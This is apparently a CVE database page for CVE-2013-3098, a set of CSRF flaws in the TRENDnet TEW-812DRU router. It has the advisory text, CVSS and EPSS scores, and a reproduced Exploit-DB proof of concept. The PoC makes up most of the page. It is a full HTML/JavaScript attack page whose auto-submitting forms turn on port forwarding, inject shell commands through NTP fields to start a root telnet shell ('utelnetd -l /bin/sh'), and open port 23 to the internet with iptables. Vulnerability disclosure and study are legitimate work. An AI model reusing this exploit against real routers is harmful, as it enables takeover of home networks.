CVE-2013-3098
Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Multiple cross-site request forgery (CSRF) vulnerabilities in TRENDnet TEW-812DRU router with firmware before 1.0.9.0 allow remote attackers to hijack the authentication of administrators for requests that (1) change admin credentials in a request to setSysAdm.cgi, (2) enable remote management or (3) enable port forwarding in an Apply action to uapply.cgi, or (4) have unspecified impact via a request to setNTP.cgi. NOTE: some of these details are obtained from third party information.
CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| Cross-Site Request Forgery (CSRF) The web application does not, or cannot, sufficiently verify whether a request was intentionally provided by the user who sent the request, which could have originated from an unauthorized actor. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 6.8 | AV:N/AC:M/Au:N/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 27177
Publication date : 2013-07-27 22h00 +00:00
Author : Jacob Holcomb
EDB Verified : No
<html>
<head>
<title> TRENDnet TEW-812DRU CSRF - Command Injection > Shell Exploit.</title>
<!--
# CSRF Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators
# Command Injection(s) Discovered by: Jacob Holcomb & Kedy Liu - Security Analysts @ Independent Security Evaluators
# Exploited by: Jacob Holcomb - Security Analyst @ Independnet Security Evaluators
# CVE: CSRF - CVE-2013-3098 & Multiple Command Injection - CVE-2013-3365
# http://infosec42.blogspot.com
# http://securityevaluators.com
-->
</head>
<body>
<img src="http://192.168.10.1/Images/logo.gif"><!--TRENDnet Logo for attack launch page -->
<h1>Please wait... </h1>
<script type="text/javascript">
//Request to enable port forwarding to the routers internal IP on port 23
//This exploit works without this request, but the exploit was more stable with it, so its included in thos PoC.
function RF1(){
document.write('<form name="portfwd" target ="_blank" action="http://192.168.10.1/uapply.cgi" method="post">'+
'<input type="hidden" name="page" value="/advanced/single_port.asp">'+
'<input type="hidden" name="forward_port_enable" value="0">'+
'<input type="hidden" name="forward_port" value="24">'+
'<input type="hidden" name="forward_port_proto0" value="tcp">'+
'<input type="hidden" name="forward_port_from_start0" value="23">'+
'<input type="hidden" name="forward_port_from_end0" value="23">'+
'<input type="hidden" name="forward_port_to_ip0" value="192.168.10.1">'+
'<input type="hidden" name="forward_port_to_start0" value="23">'+
'<input type="hidden" name="forward_port_to_end0" value="23">'+
'<input type="hidden" name="schedule0" value="0">'+
'<input type="hidden" name="forward_port_enable0" value="on">'+
'<input tpye="hidden" name="action" value="Apply">'+
'</form>');
}
//Request to enable telnet
function RF2(){
document.write('<form name="enable23" target="_blank" action="http://192.168.10.1/setNTP.cgi" method="post">'+
'<input type="hidden" name="page" value="/adm/time.asp">'+
'<input type="hidden" name="DSTenable" value="on">'+
'<input type="hidden" name="NtpDstEnable" value="1">'+
'<input type="hidden" name="NtpDstOffset" value="`utelnetd -l /bin/sh`">'+
'<input type="hidden" name="NtpDstStart" value="030102">'+
'<input type="hidden" name="tz_daylight_start_month_select" value="03">'+
'<input type="hidden" name="tz_daylight_start_day_select" value="01">'+
'<input type="hidden" name="tz_daylight_start_time_select" value="02">'+
'<input type="hidden" name="NtpDstEnd" value="100102">'+
'<input type="hidden" name="tz_daylight_end_month_select" value="10">'+
'<input type="hidden" name="tz_daylight_end_day_select" value="01">'+
'<input type="hidden" name="tz_daylight_end_time_select" value="02">'+
'<input type="hidden" name="ntp_server" value="1">'+
'<input type="hidden" name="NTPServerIP" value="pool.ntp.org">'+
'<input type="hidden" name="time_zone" value="UCT_-11">'+
'<input type="hidden" name="timer_interval" value="300">'+
'<input type="hidden" name="manual_year_select" value="2012">'+
'<input type="hidden" name="manual_month_select" value="01">'+
'<input type="hidden" name="manual_day_select" value="01">'+
'<input type="hidden" name="manual_hour_select" value="00">'+
'<input type="hidden" name="manual_min_select" value="19">'+
'<input type="hidden" name="manual_sec_select" value="57">'+
'<input type="hidden" name="timeTag" value="manual">'+
'</form>');
}
//Request to change iptables to allow port 23 from the WAN.
function RF3(){
document.write(
'<form name="ipTableRule" target="_blank" action="http://192.168.10.1/setNTP.cgi" method="post">'+
'<input type="hidden" name="page" value="/adm/time.asp">'+
'<input type="hidden" name="DSTenable" value="on">'+
'<input type="hidden" name="NtpDstEnable" value="1">'+
'<input type="hidden" name="NtpDstOffset" value="3600">'+
'<input type="hidden" name="NtpDstStart" value="030102">'+
'<input type="hidden" name="tz_daylight_start_month_select" value="03">'+
'<input type="hidden" name="tz_daylight_start_day_select" value="01">'+
'<input type="hidden" name="tz_daylight_start_time_select" value="02">'+
'<input type="hidden" name="NtpDstEnd" value="`count=0;while [ $count -le 25 ]; do iptables -I INPUT 1 -p tcp --dport 23 -j ACCEPT;(( count++ ));done;`">'+
'<input type="hidden" name="tz_daylight_end_month_select" value="10">'+
'<input type="hidden" name="tz_daylight_end_day_select" value="01">'+
'<input type="hidden" name="tz_daylight_end_time_select" value="02">'+
'<input type="hidden" name="ntp_server" value="1">'+
'<input type="hidden" name="NTPServerIP" value="pool.ntp.org">'+
'<input type="hidden" name="time_zone" value="UCT_-11">'+
'<input type="hidden" name="timer_interval" value="300">'+
'<input type="hidden" name="manual_year_select" value="2012">'+
'<input type="hidden" name="manual_month_select" value="01">'+
'<input type="hidden" name="manual_day_select" value="01">'+
'<input type="hidden" name="manual_hour_select" value="00">'+
'<input type="hidden" name="manual_min_select" value="19">'+
'<input type="hidden" name="manual_sec_select" value="57">'+
'<input type="hidden" name="timeTag" value="manual">'+
'</form>');
}
function createPage(){
RF1();
RF2();
RF3();
document.write('<iframe src="http://192.168.10.1/" target="_blank" width="100%" height="100%" frameborder="0" style="border: 0; position:fixed; top:0; left:0; right:0; bottom:0;"></iframe>');
}
function _portfwd(){
document.portfwd.submit();
}
function _enable23(){
document.enable23.submit();
}
function _ipTableRule(){
document.ipTableRule.submit();i
}
//Called Functions
createPage()
for(var i = 0; i < 3; i++){
if(i == 0){
window.setTimeout(_portfwd, 1000);
}
else if(i == 1){
window.setTimeout(_enable23, 2000);
}
else if(i == 2){
window.setTimeout(_ipTableRule, 4000);
}
else{
continue;
}
}
</script>
</body>
</html>
Products Mentioned
Configuraton 0
Trendnet>>Tew-812dru_firmware >> Version 1.0.8.0
- Trendnet>>Tew-812dru_firmware >> Version 1.0.8.0 (Open CPE detail)
Trendnet>>Tew-812dru >> Version -
- Trendnet>>Tew-812dru >> Version - (Open CPE detail)
References
http://securityevaluators.com/content/case-studies/routers/Vulnerability_Catalog.pdf
Tags : x_refsource_MISC
Tags : x_refsource_MISC
http://securityevaluators.com/knowledge/case_studies/routers/trendnet_tew-812dru.php
Tags : x_refsource_MISC
Tags : x_refsource_MISC
http://infosec42.blogspot.com/2013/07/exploit-trendnet-tew-812dru-csrfcommand.html
Tags : x_refsource_MISC
Tags : x_refsource_MISC
